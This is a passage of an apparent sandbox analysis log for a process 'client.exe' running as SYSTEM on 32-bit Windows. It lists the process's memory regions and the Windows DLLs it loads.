0x5a0 Thread: id = 470 os_tid = 0x7e0 Thread: id = 471 os_tid = 0x4a8 Thread: id = 472 os_tid = 0x5c4 Process: id = "50" image_name = "client.exe" filename = "c:\\windows\\client.exe" page_root = "0x6b052000" os_pid = "0xd40" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "38" os_parent_pid = "0x1c8" cmd_line = "C:\\Windows\\Client.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Region: id = 6994 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 6995 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 6996 start_va = 0x40000 end_va = 0x40fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 6997 start_va = 0x50000 end_va = 0x8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 6998 start_va = 0x90000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 6999 start_va = 0x190000 end_va = 0x193fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 7000 start_va = 0x1a0000 end_va = 0x1a1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 7001 start_va = 0x400000 end_va = 0x8d9fff monitored = 1 entry_point = 0x81133c region_type = mapped_file name = "client.exe" filename = "\\Windows\\Client.exe" (normalized: "c:\\windows\\client.exe") Region: id = 7002 start_va = 0x77800000 end_va = 0x779a8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 7003 start_va = 0x779e0000 end_va = 0x77b5ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 7004 start_va = 0x7efb0000 end_va = 0x7efd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 7005 start_va = 0x7efdb000 end_va = 0x7efddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 7006 start_va = 0x7efde000 end_va = 0x7efdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 7007 start_va = 0x7efdf000 end_va = 0x7efdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 7008 start_va = 0x7efe0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 7009 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 7010 start_va = 0x7fff0000 end_va = 0x7fffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 7011 start_va = 0x300000 end_va = 0x37ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 7012 start_va = 0x75250000 end_va = 0x75257fff monitored = 0 entry_point = 0x752520f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 7013 start_va = 0x75260000 end_va = 0x752bbfff monitored = 0 entry_point = 0x7529f9f4 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 7014 start_va = 0x752c0000 end_va = 0x752fefff monitored = 0 entry_point = 0x752ee088 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 7015 start_va = 0x776e0000 end_va = 0x777fefff monitored = 0 entry_point = 0x776f5340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 7016 start_va = 0x769b0000 end_va = 0x76abffff monitored = 0 entry_point = 0x769c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 7017 start_va = 0x776e0000 end_va = 0x777fefff monitored = 0 entry_point = 0x776f5340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 7018 start_va = 0x776e0000 end_va = 0x777fefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000776e0000" filename = "" Region: id = 7019 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 0 entry_point = 0x775fa2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 7020 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000775e0000" filename = "" Region: id = 7021 start_va = 0x8e0000 end_va = 0xb2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008e0000" filename = "" Region: id = 7022 start_va = 0x769b0000 end_va = 0x76abffff monitored = 0 entry_point = 0x769c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 7023 start_va = 0x76fe0000 end_va = 0x77026fff monitored = 0 entry_point = 0x76fe74c1 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 7024 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 7025 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 7026 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 7027 start_va = 0x1b0000 end_va = 0x216fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 7056 start_va = 0x76d80000 end_va = 0x76e74fff monitored = 0 entry_point = 0x76d81865 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\SysWOW64\\wininet.dll" (normalized: "c:\\windows\\syswow64\\wininet.dll") Region: id = 7057 start_va = 0x76cc0000 end_va = 0x76d6bfff monitored = 0 entry_point = 0x76cca472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 7058 start_va = 0x771d0000 end_va = 0x77226fff monitored = 0 entry_point = 0x771e9ba6 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 7059 start_va = 0x77240000 end_va = 0x772cffff monitored = 0 entry_point = 0x77256343 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 7060 start_va = 0x773b0000 end_va = 0x774affff monitored = 0 entry_point = 0x773cb6ed region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 7061 start_va = 0x76c20000 end_va = 0x76cbffff monitored = 0 entry_point = 0x76c349e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 7062 start_va = 0x76900000 end_va = 0x76918fff monitored = 0 entry_point = 0x76904975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 7063 start_va = 0x75bc0000 end_va = 0x75caffff monitored = 0 entry_point = 0x75bd0569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 7064 start_va = 0x75530000 end_va = 0x7558ffff monitored = 0 entry_point = 0x7554a3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 7065 start_va = 0x75520000 end_va = 0x7552bfff monitored = 0 entry_point = 0x755210e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 7066 start_va = 0x75780000 end_va = 0x75789fff monitored = 0 entry_point = 0x757836a0 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 7067 start_va = 0x76ac0000 end_va = 0x76b5cfff monitored = 0 entry_point = 0x76af3fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 7068 start_va = 0x75a80000 end_va = 0x75bb5fff monitored = 0 entry_point = 0x75a81b35 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\SysWOW64\\urlmon.dll" (normalized: "c:\\windows\\syswow64\\urlmon.dll") Region: id = 7069 start_va = 0x76e80000 end_va = 0x76fdbfff monitored = 0 entry_point = 0x76ecba3d region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 7070 start_va = 0x757f0000 end_va = 0x7587efff monitored = 0 entry_point = 0x757f3fb1 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 7071 start_va = 0x75650000 end_va = 0x75770fff monitored = 0 entry_point = 0x7565158e region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll") Region: id = 7072 start_va = 0x76d70000 end_va = 0x76d7bfff monitored = 0 entry_point = 0x76d7238e region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll") Region: id = 7073 start_va = 0x75880000 end_va = 0x75a7afff monitored = 0 entry_point = 0x758822d9 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll") Region: id = 7074 start_va = 0x72c10000 end_va = 0x72c60fff monitored = 0 entry_point = 0x72c3988c region_type = mapped_file name = "winspool.drv" filename = "\\Windows\\SysWOW64\\winspool.drv" (normalized: "c:\\windows\\syswow64\\winspool.drv") Region: id = 7284 start_va = 0x745f0000 end_va = 0x7478dfff monitored = 0 entry_point = 0x7461e6b5 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll") Region: id = 7285 start_va = 0x75cb0000 end_va = 0x768f9fff monitored = 0 entry_point = 0x75d31601 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 7286 start_va = 0x74520000 end_va = 0x74528fff monitored = 0 entry_point = 0x74521220 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 7287 start_va = 0x75310000 end_va = 0x75320fff monitored = 0 entry_point = 0x75311300 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\SysWOW64\\netapi32.dll" (normalized: "c:\\windows\\syswow64\\netapi32.dll") Region: id = 7288 start_va = 0x753e0000 end_va = 0x753e8fff monitored = 0 entry_point = 0x753e15a6 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\SysWOW64\\netutils.dll" (normalized: "c:\\windows\\syswow64\\netutils.dll") Region: id = 7289 start_va = 0x75380000 end_va = 0x75398fff monitored = 0 entry_point = 0x75381319 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\SysWOW64\\srvcli.dll" (normalized: "c:\\windows\\syswow64\\srvcli.dll") Region: id = 7290 start_va = 0x753b0000 end_va = 0x753befff monitored = 0 entry_point = 0x753b12a1 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\SysWOW64\\wkscli.dll" (normalized: "c:\\windows\\syswow64\\wkscli.dll") Region: id = 7291 start_va = 0x6bf10000 end_va = 0x6bf14fff monitored = 0 entry_point = 0x6bf111d0 region_type = mapped_file name = "shfolder.dll" filename = "\\Windows\\SysWOW64\\shfolder.dll" (normalized: "c:\\windows\\syswow64\\shfolder.dll") Region: id = 7292 start_va = 0x6be10000 end_va = 0x6be16fff monitored = 0 entry_point = 0x6be11120 region_type = mapped_file name = "wsock32.dll" filename = "\\Windows\\SysWOW64\\wsock32.dll" (normalized: "c:\\windows\\syswow64\\wsock32.dll") Region: id = 7293 start_va = 0x75610000 end_va = 0x75644fff monitored = 0 entry_point = 0x7561145d region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 7294 start_va = 0x76c10000 end_va = 0x76c15fff monitored = 0 entry_point = 0x76c11782 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 7300 start_va = 0xb30000 end_va = 0xd1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000b30000" filename = "" Region: id = 7301 start_va = 0x20000 end_va = 0x3dfff monitored = 0 entry_point = 0x3158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 7302 start_va = 0xb30000 end_va = 0xcb7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b30000" filename = "" Region: id = 7303 start_va = 0xd10000 end_va = 0xd1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000d10000" filename = "" Region: id = 7304 start_va = 0x20000 end_va = 0x3dfff monitored = 0 entry_point = 0x3158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 7305 start_va = 0x76b90000 end_va = 0x76beffff monitored = 0 entry_point = 0x76ba158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 7306 start_va = 0x774b0000 end_va = 0x7757bfff monitored = 0 entry_point = 0x774b168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 7307 start_va = 0x220000 end_va = 0x2dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000220000" filename = "" Region: id = 7308 start_va = 0xd20000 end_va = 0xea0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d20000" filename = "" Region: id = 7309 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 7310 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 7515 start_va = 0xeb0000 end_va = 0x109ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000eb0000" filename = "" Region: id = 7516 start_va = 0x2e0000 end_va = 0x2e0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 7517 start_va = 0x2f0000 end_va = 0x2f1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 7519 start_va = 0x8e0000 end_va = 0xa1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008e0000" filename = "" Region: id = 7520 start_va = 0xa30000 end_va = 0xb2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a30000" filename = "" Region: id = 7740 start_va = 0x10a0000 end_va = 0x136efff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 7754 start_va = 0x2e0000 end_va = 0x2e0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\SysWOW64\\tzres.dll" (normalized: "c:\\windows\\syswow64\\tzres.dll") Region: id = 7755 start_va = 0x380000 end_va = 0x386fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\tzres.dll.mui") Region: id = 7756 start_va = 0x2e0000 end_va = 0x2e0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\SysWOW64\\tzres.dll" (normalized: "c:\\windows\\syswow64\\tzres.dll") Region: id = 7757 start_va = 0x380000 end_va = 0x386fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\tzres.dll.mui") Region: id = 7758 start_va = 0x2e0000 end_va = 0x2e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 7759 start_va = 0x75370000 end_va = 0x7537cfff monitored = 0 entry_point = 0x753711e0 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\SysWOW64\\wtsapi32.dll" (normalized: "c:\\windows\\syswow64\\wtsapi32.dll") Region: id = 7760 start_va = 0x72be0000 end_va = 0x72c08fff monitored = 0 entry_point = 0x72be6b19 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\SysWOW64\\winsta.dll" (normalized: "c:\\windows\\syswow64\\winsta.dll") Region: id = 7762 start_va = 0x380000 end_va = 0x3bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000380000" filename = "" Region: id = 7763 start_va = 0xeb0000 end_va = 0xfaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000eb0000" filename = "" Region: id = 7764 start_va = 0x1090000 end_va = 0x109ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001090000" filename = "" Region: id = 7765 start_va = 0x7efd8000 end_va = 0x7efdafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efd8000" filename = "" Region: id = 7767 start_va = 0x3c0000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 7768 start_va = 0x1370000 end_va = 0x146ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001370000" filename = "" Region: id = 7769 start_va = 0x74430000 end_va = 0x744affff monitored = 0 entry_point = 0x744437c9 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 7770 start_va = 0x7efd5000 end_va = 0x7efd7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efd5000" filename = "" Region: id = 7771 start_va = 0x1470000 end_va = 0x15dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 7772 start_va = 0xa20000 end_va = 0xa24fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\user32.dll.mui") Region: id = 7773 start_va = 0xcc0000 end_va = 0xccffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000cc0000" filename = "" Region: id = 7774 start_va = 0x75300000 end_va = 0x75302fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "security.dll" filename = "\\Windows\\SysWOW64\\security.dll" (normalized: "c:\\windows\\syswow64\\security.dll") Region: id = 7775 start_va = 0x72bd0000 end_va = 0x72bd7fff monitored = 0 entry_point = 0x72bd10e9 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\SysWOW64\\secur32.dll" (normalized: "c:\\windows\\syswow64\\secur32.dll") Region: id = 7776 start_va = 0xcd0000 end_va = 0xcd2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "comctl32.dll.mui" filename = "\\Windows\\winsxs\\x86_microsoft.windows.c..-controls.resources_6595b64144ccf1df_6.0.7600.16385_en-us_581cd2bf5825dde9\\comctl32.dll.mui" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.c..-controls.resources_6595b64144ccf1df_6.0.7600.16385_en-us_581cd2bf5825dde9\\comctl32.dll.mui") Region: id = 7777 start_va = 0x1470000 end_va = 0x1570fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 7778 start_va = 0x15a0000 end_va = 0x15dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015a0000" filename = "" Region: id = 7974 start_va = 0x15e0000 end_va = 0x29e7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 7975 start_va = 0x29f0000 end_va = 0x3df7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 7976 start_va = 0x15e0000 end_va = 0x29e7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 7977 start_va = 0x29f0000 end_va = 0x3df7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 7978 start_va = 0x15e0000 end_va = 0x29e7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 7979 start_va = 0x29f0000 end_va = 0x3df7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 7980 start_va = 0x15e0000 end_va = 0x29e7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 7981 start_va = 0x29f0000 end_va = 0x3df7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 7982 start_va = 0x15e0000 end_va = 0x29e7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 7983 start_va = 0x29f0000 end_va = 0x3df7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 7984 start_va = 0xce0000 end_va = 0xceffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ce0000" filename = "" Region: id = 7985 start_va = 0xce0000 end_va = 0xcf1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ce0000" filename = "" Region: id = 7986 start_va = 0xd00000 end_va = 0xd0dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d00000" filename = "" Region: id = 7987 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 7988 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 7989 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 7990 start_va = 0x15e0000 end_va = 0x29e7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 7991 start_va = 0x29f0000 end_va = 0x3df7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 7992 start_va = 0x15e0000 end_va = 0x29e7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 7993 start_va = 0x29f0000 end_va = 0x3df7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 7994 start_va = 0x15e0000 end_va = 0x29e7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 7995 start_va = 0x29f0000 end_va = 0x3df7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 7996 start_va = 0x15e0000 end_va = 0x29e7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 7997 start_va = 0x29f0000 end_va = 0x3df7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 7998 start_va = 0x15e0000 end_va = 0x29e7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 7999 start_va = 0x29f0000 end_va = 0x3df7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 8000 start_va = 0xce0000 end_va = 0xceffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ce0000" filename = "" Region: id = 8001 start_va = 0xce0000 end_va = 0xcf1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ce0000" filename = "" Region: id = 8002 start_va = 0xd00000 end_va = 0xd0dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d00000" filename = "" Region: id = 8003 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8004 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8005 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8006 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8014 start_va = 0x15e0000 end_va = 0x29e7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 8015 start_va = 0x29f0000 end_va = 0x3df7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 8016 start_va = 0x15e0000 end_va = 0x29e7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 8017 start_va = 0x29f0000 end_va = 0x3df7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 8018 start_va = 0x15e0000 end_va = 0x29e7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 8019 start_va = 0x29f0000 end_va = 0x3df7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 8020 start_va = 0x15e0000 end_va = 0x29e7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 8021 start_va = 0x29f0000 end_va = 0x3df7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 8022 start_va = 0x15e0000 end_va = 0x29e7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 8023 start_va = 0x29f0000 end_va = 0x3df7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 8024 start_va = 0xce0000 end_va = 0xceffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ce0000" filename = "" Region: id = 8025 start_va = 0xce0000 end_va = 0xcf1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ce0000" filename = "" Region: id = 8026 start_va = 0xd00000 end_va = 0xd0dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d00000" filename = "" Region: id = 8027 